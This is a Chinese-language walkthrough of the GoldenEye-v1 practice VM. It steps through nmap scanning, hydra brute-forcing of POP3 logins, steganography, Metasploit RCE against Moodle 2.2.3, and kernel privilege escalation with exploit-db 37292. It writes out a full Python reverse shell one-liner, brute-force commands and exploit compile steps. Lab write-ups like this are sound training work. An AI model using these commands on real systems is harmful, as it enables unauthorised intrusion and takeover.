【第一个项目】GoldenEye-v1

Before hack

靶机环境准备：https://cloud.189.cn/t/EZfQVfa2YNnm 访问码：om4x

点击文件自动vmware启动

Hack it

nmap端口扫描

首先要先发现这台机器的IP地址

查看本机ifconfig信息，查看ip地址，本机与靶机处于统一网段。

nmap扫一下本网段存活的IP地址。

扫出来的有域名，说明就是这个靶机。

继续信息搜集，进行端口扫描。

80端口开放的是http服务。

直接访问

按照他给的目录登陆，发现需要登陆

需要爆破密码，回去右键查看源码，看到terminal.js，有一下信息。

将InvincibleHack3rhtml解码得到InvincibleHack3r  

密码爆破

并且这段文字中还有两个人名，Boris,Natalya,试试登陆。用户名首字母大写就不行，要试试小写。

最终，boris，InvincibleHack3r为最终解。

其中有一句：

但是在端口扫描的时候并没有看到pop3服务。

那么我们进行一下nmap -p- 全端口扫描。

扫出两个未知端口

然后再用nmap探测底层的详细的信息

nmap -p55006,55007 ip -sS -sV -A -T5

 

hydra

上面还提示着用着密码登陆，我们可以使用hydra进行登陆破解

hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt 192.168.137.32 -s 55007 pop3

-l是文本

-L 指定文本里面的用户，- P指的是字典文件 ,-s指的是端口，最后是服务。

echo -e 'boris\nnatalya' >1.txt  使用命令，将这两个人名放进去。

启功九头蛇！

爆破出natalya的密码是bird

 

NC登陆

nc 192.168.137.32 55007  ------登陆邮箱

user boris         ------登陆用户

pass secret1!           ------登陆密码

list            ------查看邮件信息

retr 1~3           ------查看邮件信息

登陆进natalya的邮箱，有两封邮件

查看第一个

似乎没啥用

查看第二个

浅浅翻译了一下，

好的，Natalyn，我有一个新学生给你。由于这是一个新系统，如果你看到任何配置问题，请让我或boris知道，特别是它与安全有关。。。即使不是，也只是打着“安全”的幌子进入。。。它将使变更单升级，而不需要太多麻烦：）好的，

用户信誉是：用户名：xenia

密码：RCP90rulez！

Boris验证了她是一个有效的承包商，所以只需创建帐户即可，好吗？

如果你在内部域名之外没有URL：severnaya-station.com/gnocertdir

**确保编辑您的主机文件，因为您通常在网络外远程工作。。。。

由于您是Linux用户，只需将此服务器IP指向/etc/hosts中的severnaya-station.com即可。

那么就修改一下host文件吧

直接访问那个url，长这个样子

CMS

直接用上面的密码尝试登陆

成功进入

结合开头看到的moodle，可以知道这是一个开源的CMS，2.2.3为版本

结合whatweb指纹识别，有了更多的信息。

获得了另外一个人名doak，继续爆破它的密码

得到doak的密码是goat

继续nc查看它的邮箱，只有一条，查看一下

给了用户名和密码

图片隐写（binwalk，exiftool）

回到网页，用此登陆！

成功登陆

然而，并没有发现什么信息。在home的右面能看见一个文件，打开看看

访问这个图片

显然是隐写，检查一下图片内容，用wget下载图片到当前文件夹

先尝试用binwalk分离一下

分离出两个文件

用exiftool（图虫）查看图片详细信息

其中的description，base64解码后是xWinter1995x!

strings会将其变成ASCII码

回到之前，可以知道它是admin的密码，登陆网页尝试，成功登陆admin的账户

、

MSF get shell

Moole 2.2.3 exp cve ---> CVE-2013-3630 漏洞可利用   29324    https://nvd.nist.gov/vuln/detail/CVE-2013-3630

此版本有很多漏洞利用，由于我们需要在目标计算机上进行外壳访问，因此我选择远程代码执行漏洞(RCE)漏洞进行利用.

MSF启动

msfconsole进入MSF

search moodle 查找moodle类型的攻击模块

use 直接+上面的编号就行，show options显示条件

成功！注意要更改cms里面的powershell设置。如下：

安装了python

提权

python -c 'import pty; pty.spawn("/bin/bash")'       ---将shell进行tty

获得交互shell，

提权的话一定要到tmp目录下才能进行提权。

回到网页，发现另外一个地方有执行命令的地方。这是第二个拿shell的方法。

利用python的反弹shell

python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.111",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'                                 注意地址和端口需要改

先在本机开启监听

填上你的上面的python代码，并且记得保存！

点击这个触发

监听得到回显。同样建立tty

输入命令uname -a ：显示系统名、节点名称、操作系统的发行版号、内核版本等等。

找到exp，id37292

这是具体的步骤，要求有gcc（可以用cc代替）

有gcc，那么可以直接用。

search 37292

kali搜索下：
searchsploit 37292        ---搜索kali本地的exp库中37292攻击脚本信息
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/   ---目录自行修改

可以直接看到，复制到桌面后，更改其中的gcc命令为cc

在本文件夹创建了一个简短的http服务。

可以知道有wget，那么直接把文件下载到目标主机上

GET FLAG

成功下载后执行cc编译：
cc -o exp 37292.c     ---C语言的CC代码编译点c文件
chmod +x exp          ---编译成可执行文件，并赋权
./exp                 ---点杠执行

id                   ---查看目前权限

看到root就是执行成功。

ls /root,为空。可能是隐藏文件。用ls -al查看隐藏文件

最终用cat命令得到flag！